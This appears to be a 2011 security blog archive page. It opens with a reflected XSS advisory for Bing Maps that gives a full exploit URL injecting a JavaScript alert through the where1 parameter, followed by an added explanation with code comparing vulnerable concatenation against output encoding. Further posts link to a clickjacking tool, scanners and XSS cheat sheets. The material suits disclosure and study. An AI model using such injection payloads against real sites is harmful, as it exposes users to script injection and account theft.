Tuesday, 23. August 2011
BING.COM - XSS
On Tuesday, 23. Aug 2011 in topic 'Vulnerabilities'
Vendor Homepage : http://www.bing.com
Vulnerability Type : XSS Reflected
Description
------------------
BING.COM is prone to an XSS vulnerability because the application fails
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the
victim's browser.
Details
-------------------
The reflected XSS vulnerability is a variant of a cross-site scripting
flaw: it occurs when the data provided by the attacker is executed by
the browser, and then displayed on "normal" pages returned to other
users in the course of regular browsing, without proper HTML escaping. A
classic example of this is with online message boards where users are
allowed to post HTML formatted messages for other users to read.
Exploit example as follows
-----------------------------
http://www.bing.com/maps/embed/Customize.aspx
?v=2
&cp=-34.59999847400003~-58.45000076200001
&lvl=6
&dir=0
&sty=c
&eo=
&where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//
&form=LMLTEW
The vulnerability is caused by the following code and affected by the
Generate Code map
by runlvl
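The where1 value above begins with '; and ends with //, the shape that closes a single-quoted JavaScript string and comments out the rest of the line. The following is an added example, not code from Bing or from the original post: it puts raw concatenation next to an output-encoded version and evaluates both with a stubbed alert(). It assumes the parameter is echoed into such a string literal, and all function names are hypothetical.

```javascript
// Added example with constructed rendering code; not Bing's implementation.
// Assumption: where1 is echoed into a single-quoted JavaScript string literal.
const PAYLOAD =
  "';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//";

// Vulnerable: raw concatenation, so a quote in the value ends the literal.
function renderVulnerable(where1) {
  return "var where1 = '" + where1 + "';";
}

// Hardened: every UTF-16 code unit outside [A-Za-z0-9] is emitted as \uXXXX,
// so the value cannot close the string or a surrounding <script> element.
function jsStringEncode(value) {
  let out = "";
  const s = String(value);
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    out += /[A-Za-z0-9]/.test(ch)
      ? ch
      : "\\u" + s.charCodeAt(i).toString(16).padStart(4, "0");
  }
  return out;
}

function renderSafe(where1) {
  return "var where1 = '" + jsStringEncode(where1) + "';";
}

// Evaluate a rendered script with a stubbed alert() and report what happened:
// which alert() calls fired and what where1 ended up holding.
function evaluate(script) {
  const alerts = [];
  const fn = new Function("alert", script + "\nreturn where1;");
  const value = fn((msg) => alerts.push(msg));
  return { alerts, value };
}

const bad = evaluate(renderVulnerable(PAYLOAD));
const good = evaluate(renderSafe(PAYLOAD));
console.log("vulnerable:", bad);
console.log("encoded:   ", good);
```

With the encoded version the payload survives only as data: where1 holds the original text and no alert() call is made.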
Clickjacking Tool
On Tuesday, 23. Aug 2011 in topic 'Tools'
Among the features of the new tool are:
Use point-and-click to select the areas of a page to be targeted
Supports the new 'text-field injection' technique
Supports the new 'content extraction' technique
'Visible mode' replay allowing a user to see how the technique works behind the scenes
'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.
Download
http://www.contextis.co.uk/resources/tools/clickjacking-tool/cjtool.zip
Google - help me
On Tuesday, 23. Aug 2011 in topic 'Tutorials'
NESSUS - help me
On Tuesday, 23. Aug 2011 in topic 'Tutorials'
How NESSUS works
http://www.cs.cmu.edu/~dwendlan/personal/nessus.html
How to use NESSUS
http://www.symantec.com/connect/articles/introduction-nessus
Download
http://www.nessus.org/products/nessus/nessus-download-agreement
ClubHack Mag Issue 19, August 2011
On Tuesday, 23. Aug 2011 in topic 'Books change the World'
This issue covers Gonna’ Break It on Gonna’ Kick it Root Down in Tech Gyan, RSA Security in Moms Guide, SniffJoke – Defeating Interception Framework in Tool Gyan, Patent Law and Computer Technology in Legal Gyan and Social Engineering Toolkit in Matriux Vibhag
Download PDF
http://chmag.in/issue/aug2011.pdf
ClubHack Mag Issue 18-July2011
On Tuesday, 23. Aug 2011 in topic 'Books change the World'
This issue covers the following articles:
0x00 Tech Gyan - Using Metasploit with Nessus Bridge on Ubuntu
0x01 Tool Gyan - Armitage – The Ultimate Attack Platform for Metasploit
0x02 Mom's Guide - Penetration Testing with Metasploit Framework
0x03 Legal Gyan - Trademark Law and Cyberspace
0x04 Matriux Vibhag - The Exploitation Ka Baap MSF
Download PDF
http://chmag.in/issue/jul2011.pdf
XSS - Cross Site Scripting Cheat Sheet and more...
On Tuesday, 23. Aug 2011 in topic 'Tutorials'
If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you.
http://ha.ckers.org/xss.html
Here you find my custom XSS and CSRF cheat sheet
http://www.xenuser.org/xss-cheat-sheet/
Facebook Security Guide
On Tuesday, 23. Aug 2011 in topic 'News'
Protecting your Facebook account
Avoiding the scammers (very helpful examples of the most popular Facebook scams)
Using advanced security settings (one-time passwords, secure browsing, single sign-on, social authentication, etc.)
Recovering a hacked Facebook account
Stopping imposters
Download PDF
https://www.facebook.com/safety/attachment/Guide%20to%20Facebook%20Security.pdf
Uniscan 4.0 vulnerability scanner
On Tuesday, 23. Aug 2011 in topic 'Pentest'
Uniscan Features
Identification of system pages through a Web Crawler.
Use of threads in the crawler.
Control of the maximum number of requests made by the crawler.
Control of variation of system pages identified by Web Crawler.
Control of file extensions that are ignored.
Test of pages found via the GET method.
Test the forms found via the POST method.
Support for SSL requests (HTTPS).
Proxy support.
Download
http://sourceforge.net/projects/uniscan/files/4.0/uniscan.tar/download
JonDoFox 2.5.3 - anonymous and secure
On Tuesday, 23. Aug 2011 in topic 'Web Security'
JonDoFox is a profile for the Mozilla Firefox web browser particularly optimized for anonymous and secure web surfing. For anonymous surfing you need an IP changer proxy too. We recommend our proxy tool JonDo but you may use other anonymisation services like Tor Onion Router.
Download
https://anonymous-proxy-servers.net/en/jondofox.html
update: OWASP Zed Attack Proxy v.1.3.2 Released
On Tuesday, 23. Aug 2011 in topic 'Pentest'
The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen tester's toolbox.
Download
http://code.google.com/p/zaproxy/downloads/list
tor2web: visit anonymous websites
On Tuesday, 23. Aug 2011 in topic 'Web Security'
Tor is a software project that lets you use the Internet anonymously. tor2web is a project to let Internet users access anonymous servers.
Source
http://tor2web.org/